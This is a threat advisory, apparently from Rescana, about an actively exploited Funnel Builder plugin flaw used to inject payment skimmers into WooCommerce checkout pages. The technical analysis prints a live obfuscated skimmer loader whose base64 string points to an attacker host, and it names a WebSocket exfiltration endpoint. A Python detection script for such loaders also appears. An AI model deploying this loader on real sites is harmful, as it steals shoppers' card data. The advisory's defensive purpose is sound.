Funnel Builder Plugin Vulnerability Actively Exploited: WooCommerce Checkout Skimming Puts 40,000+ WordPress Sites at Risk

Executive Summary

A critical unauthenticated vulnerability in the Funnel Builder plugin by FunnelKit for WordPress is under active exploitation, enabling sophisticated threat actors to inject malicious JavaScript into WooCommerce checkout pages. This flaw, present in all versions of Funnel Builder prior to 3.15.0.3, allows attackers to deploy advanced payment card skimmers, resulting in the theft of credit card numbers, CVVs, billing addresses, and other sensitive customer data. The attack leverages a lack of permission checks on a public endpoint, affecting over 40,000 e-commerce sites globally. The exploitation is ongoing, with evidence of widespread compromise and data exfiltration to attacker-controlled infrastructure. Immediate patching and forensic review are strongly advised.

Threat Actor Profile

The exploitation campaign exhibits strong alignment with the tactics, techniques, and procedures (TTPs) of Magecart-style cybercriminal groups, notorious for targeting e-commerce platforms with web skimming malware. These actors are financially motivated, highly skilled in obfuscation, and adept at leveraging supply chain vulnerabilities in popular plugins such as Funnel Builder. The attackers utilize infrastructure mimicking legitimate analytics services, such as spoofed Google Analytics or Tag Manager domains, to evade detection and maximize dwell time. While no specific advanced persistent threat (APT) group has been formally attributed, the operational sophistication and monetization strategy are consistent with established Magecart collectives.

Technical Analysis of Malware/TTPs

The vulnerability in Funnel Builder arises from an unauthenticated arbitrary option update flaw. Specifically, the plugin exposes a public checkout endpoint that, in versions prior to 3.15.0.3, lacks adequate permission checks and method restrictions. This allows remote attackers to invoke internal methods and write arbitrary data into the plugin’s global settings.

Attackers exploit this by injecting JavaScript into the “External Scripts” configuration. The injected code is executed on every WooCommerce checkout page, enabling real-time skimming of payment data. The malicious payload is typically obfuscated and masquerades as a legitimate analytics script. For example, observed payloads use base64-encoded URLs and asynchronous script loading to fetch secondary JavaScript from attacker-controlled domains such as analytics-reports[.]com.

A representative payload observed in the wild is as follows:

    (function(i, s, o, g, r) {
        window.addEventListener("load", function() {
            a = s.createElement(o);
            a.async = 1;
            a.src = atob(r);
            s.body.appendChild(a);
        });
    })(window, document, "script", "www.google-analytics.com/analytics.js", "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");

The base64 string decodes to https://analytics-reports[.]com/wss/jquery-lib.js, which loads a secondary script establishing a WebSocket connection to wss://protect-wss[.]com/ws. Through this channel, a customized skimmer is streamed to the victim’s browser, capturing and exfiltrating payment data in real time.

Key technical indicators include the presence of unfamiliar scripts in the FunnelKit “External Scripts” setting, especially those referencing non-Google domains, and outbound WebSocket connections to suspicious endpoints. The malware is highly evasive, leveraging legitimate-looking domains and asynchronous loading to bypass traditional security controls.

Exploitation in the Wild

The vulnerability was first identified and reported by Sansec, a leading e-commerce security research firm, which observed active exploitation across thousands of WooCommerce stores. The attack pattern closely mirrors previous Magecart campaigns, with skimmers disguised as analytics scripts and rapid deployment across vulnerable sites.

Victim sites are typically compromised via automated scanning and exploitation of the vulnerable endpoint, followed by injection of the skimmer payload. The attackers then harvest payment data from unsuspecting customers during the checkout process. Stolen data is exfiltrated via WebSocket to attacker infrastructure and is believed to be monetized through dark web carding markets.

The scale of exploitation is significant, with over 40,000 sites at risk and confirmed incidents of data theft. The attack is global in scope, affecting e-commerce operators in all regions where WooCommerce and Funnel Builder are deployed.

Victimology and Targeting

The primary targets are e-commerce businesses operating WordPress sites with the Funnel Builder plugin installed, particularly those running versions prior to 3.15.0.3. The attack is indiscriminate, affecting small businesses and large retailers alike, with no evidence of sector-specific or geographic targeting. The common denominator is the use of the vulnerable plugin in conjunction with WooCommerce checkout functionality.

Victims include online merchants processing credit card payments, with customer data at risk during the checkout process. The impact extends to end customers, whose payment information may be stolen and subsequently used for fraudulent transactions or sold on underground markets.

Mitigation and Countermeasures

Immediate action is required to mitigate this threat. All organizations using Funnel Builder must update to version 3.15.0.3 or later via the WordPress dashboard. After patching, administrators should review the FunnelKit “External Scripts” setting under Settings > Checkout and remove any unfamiliar or suspicious scripts, particularly those referencing non-Google domains.

A comprehensive malware scan should be conducted using reputable tools such as Sansec eComscan or equivalent, to detect and remove any residual skimmers or backdoors. It is also recommended to review web server logs for evidence of unauthorized option updates or suspicious HTTP requests to the public checkout endpoint.
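To support the "External Scripts" review step above and the indicators described in the technical analysis, here is an added Python example (not code from the advisory, FunnelKit, or Sansec). It takes the raw setting value or a checkout page's HTML, decodes base64 string literals the way the observed loader's atob() call does, and flags any plain or decoded URL that points at a WebSocket endpoint or at a host outside an allow-list. The allow-list and the two sample inputs are constructed assumptions; the sample loader is the one quoted in this advisory.

```python
import base64
import re
from urllib.parse import urlparse
# Hosts a checkout is expected to load third-party scripts from. This allow-list
# is an assumption; replace it with the store's own tag inventory.
ALLOWED_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}
URL_RE = re.compile(r'(?:https?|wss?)://[^\s"\'<>)]+')
# Quoted strings made only of base64 characters, like the loader's last argument.
B64_LITERAL_RE = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')

def decode_b64(literal):
    """Decode a base64 literal as a browser's atob() would; None if not base64."""
    padded = literal + "=" * (-len(literal) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def review_external_scripts(text):
    """Return (kind, value) findings for a script snippet or checkout page HTML."""
    findings, decoded_urls = [], []
    # 1. URLs hidden in base64 literals, as in the observed loader.
    for literal in B64_LITERAL_RE.findall(text):
        decoded = decode_b64(literal)
        if decoded and URL_RE.search(decoded):
            findings.append(("base64_url", decoded))
            decoded_urls.append(decoded)
    # 2. Every plain or decoded URL: WebSocket endpoints and hosts off the allow-list.
    for url in URL_RE.findall("\n".join([text] + decoded_urls)):
        if url.startswith(("ws://", "wss://")):
            findings.append(("websocket", url))
        elif (host := urlparse(url).hostname) not in ALLOWED_HOSTS:
            findings.append(("unexpected_host", host))
    return findings

# Constructed sample: a normal Google tag plus the loader quoted in the advisory.
SAMPLE_CHECKOUT = '''<script async src="https://www.googletagmanager.com/gtag/js?id=G-PLACEHOLDER"></script>
<script>(function(i, s, o, g, r) {
  window.addEventListener("load", function() {
    a = s.createElement(o); a.async = 1; a.src = atob(r); s.body.appendChild(a); });
})(window, document, "script", "www.google-analytics.com/analytics.js",
  "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");</script>'''
# Constructed stand-in for the secondary script's WebSocket call described above.
SAMPLE_SECONDARY = 'var ws = new WebSocket("wss://protect-wss.com/ws");'

if __name__ == "__main__":
    for name, blob in (("checkout", SAMPLE_CHECKOUT), ("secondary", SAMPLE_SECONDARY)):
        for kind, value in review_external_scripts(blob):
            print(f"{name}: {kind}: {value}")
```

A clean setting produces an empty list; anything flagged should be compared against the tags the store actually deployed before removal.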

The vendor patch introduces robust permission checks and restricts the vulnerable endpoint to an allow-list of safe methods, effectively closing the attack vector. Ongoing monitoring for indicators of compromise, such as outbound connections to analytics-reports[.]com or protect-wss[.]com, is advised.

Organizations should also consider implementing web application firewalls (WAFs) with rules to block known malicious domains and enhance monitoring of checkout page scripts. Regular plugin updates and security reviews are essential to prevent future exploitation.

References

BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/

Sansec Research: Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited

Sansec LinkedIn Advisory https://www.linkedin.com/posts/sansec_a-critical-vulnerability-in-funnel-builder-activity-7460783153562132480-ttT7

WPScan Vulnerability Entry https://wpscan.com/vulnerability/d553cff4-074a-44e7-aebe-e61c86ab8042/

Wordfence Threat Intelligence https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/funnel-builder/funnelkit-funnel-builder-for-woocommerce-checkout-31501-unauthenticated-sql-injection

Reddit Discussion https://www.reddit.com/r/cybersecurity/comments/1tesp1q/funnel_builder_wordpress_plugin_bug_exploited_to/

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform empowers security teams to identify vulnerabilities, track emerging threats, and ensure compliance with industry best practices. For more information or to discuss your organization’s security posture, we are happy to answer questions at ops@rescana.com.